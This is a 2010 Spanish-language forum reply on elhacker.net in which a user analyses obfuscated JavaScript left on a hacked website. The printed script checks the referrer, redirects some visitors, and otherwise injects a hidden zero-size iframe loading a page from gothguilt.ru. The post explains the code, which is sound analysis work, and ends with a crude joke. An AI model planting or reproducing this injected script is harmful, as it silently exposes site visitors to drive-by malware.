elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderador: r32)
| | |-+  Me hackearon y dejaron un regalo. ayuda!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 [2] Ir Abajo Respuesta Imprimir
Autor Tema: Me hackearon y dejaron un regalo. ayuda!  (Leído 7,031 veces)
cgvwzq

Desconectado Desconectado

Mensajes: 57


Agente P.


Ver Perfil WWW
Re: Me hackearon y dejaron un regalo. ayuda!
« Respuesta #10 en: 15 Mayo 2010, 20:49 pm »

He mirado un poco más la parte de la web. La página en cuestión solo se muestra si existe la cabecera Referer:, y contiene el siguiente script:

Código
  1. try{
  2.  
  3. F53981243 = document.referrer;
  4. Nsrd2unvt = '';
  5. Tfym92yesygh = 'ES';
  6. function Cr8z7f2tf8(V8vurp6x9cfrz){
  7.  if (F53981243.indexOf(V8vurp6x9cfrz) != -1){
  8.    Nsrd2unvt=V8vurp6x9cfrz;
  9.   }
  10. }
  11. Cr8z7f2tf8('g*o7o]gXl*e7.Xr6u*'.replace(/[\*67X\]]/g, ''));
  12. Cr8z7f2tf8('m2aDi#l2.2rDu2'.replace(/[2D#\|X]/g, ''));
  13. Cr8z7f2tf8('y{ain)d{e)xT.CriuT'.replace(/[T\{C\)i]/g, ''));
  14. Cr8z7f2tf8('rpaBmpb~lBepro.prou('.replace(/[\(~pBo]/g, ''));
  15.  
  16. if (Nsrd2unvt && Tfym92yesygh == 'RU'){
  17.    window.location= 'hPtPtxpx:~/P/AleiegAhAtA.Ak~aetPaelPo~g~-edPoeseuxgxaA.Ar~ue/A?~sPtPixde=P8A8x&ArAiPdx=~2e5x5~6x'.replace(/[x~ePA]/g, '');
  18. }else{
  19.    Athvzpwjthi8chwh = 'http://gothguilt.ru:8080/index.php?pid=1&home=1';
  20.    F7ipjzz32gtxvlp7amy = 24-(12*2);
  21.    var D6ouc495shy0 = document.createElement('div');
  22.    D6ouc495shy0.id = 'G6i85jq19fd';
  23.    document.body.appendChild(D6ouc495shy0);
  24.    Pygxn4t7yxe6p = 'F7ipjzz32gtxvlp7amy';
  25.    F15fy37lsuro9 = document.createElement('i$^f@&r((^a&@$!m)$e)$(&'.replace(/\)|\$|@|\^|#|&|\!|\(/ig, ''));
  26.    F15fy37lsuro9.src = Athvzpwjthi8chwh;
  27.    F15fy37lsuro9.height = F7ipjzz32gtxvlp7amy;
  28.    F15fy37lsuro9.width = F7ipjzz32gtxvlp7amy;
  29.    document.getElementById('G6i85jq19fd').appendChild(F15fy37lsuro9);
  30. }
  31. }catch(e){}
  32.  

Si lo limpiamos un poco, vemos que comprueba el Referrer, y en caso de que contenga 'RU' nos redireccionará a una página de rusas...xD
Sino crea un div y mete un iframe de 'http://gothguilt.ru:8080/index.php?pid=1&home=1'. Es el mismo malware que se usa en todas las páginas que he visto: la misma ofuscación, mismas comprobaciones, y al final solo dejan un iframe metido para ejecutar los comandos que quieran en la víctima que visite la página infectada...

Lo curioso es que me ha mostrado el script la primera vez, y ahora lo estoy tratando de recuperar y no puedo.

En cualquier caso la moraleja es clara: navega con proxy ruso, menos malware y más teta.


En línea

Some stuff:

  • www.a] parsed as ]www.a]
  • Bypass elhacker's img filter with ALT attribute!
  • ¿Para cuándo SQLi I y II? WZ


Páginas: 1 [2] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda par escribir dedicatoria para tarjeta regalo
Foro Libre
skan 0 615 Último mensaje 24 Diciembre 2014, 15:14 pm
por skan
Hackearon el sitio web de Wikileaks y dejaron un mensaje desafiante
Noticias
wolfbcn 1 822 Último mensaje 3 Septiembre 2017, 14:05 pm
por #!drvy
Me hackearon! Ayuda
Seguridad
Chubita 3 1,902 Último mensaje 23 Octubre 2017, 23:59 pm
por Code99
Hackearon cientos de páginas de Israel y dejaron un video amenazante: “Prepárens
Foro Libre
El_Andaluz 0 486 Último mensaje 22 Mayo 2020, 04:25 am
por El_Andaluz
me hackearon y necesito ayuda
Hacking
giuaabdon 6 943 Último mensaje 20 Octubre 2021, 16:04 pm
por Serapis
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines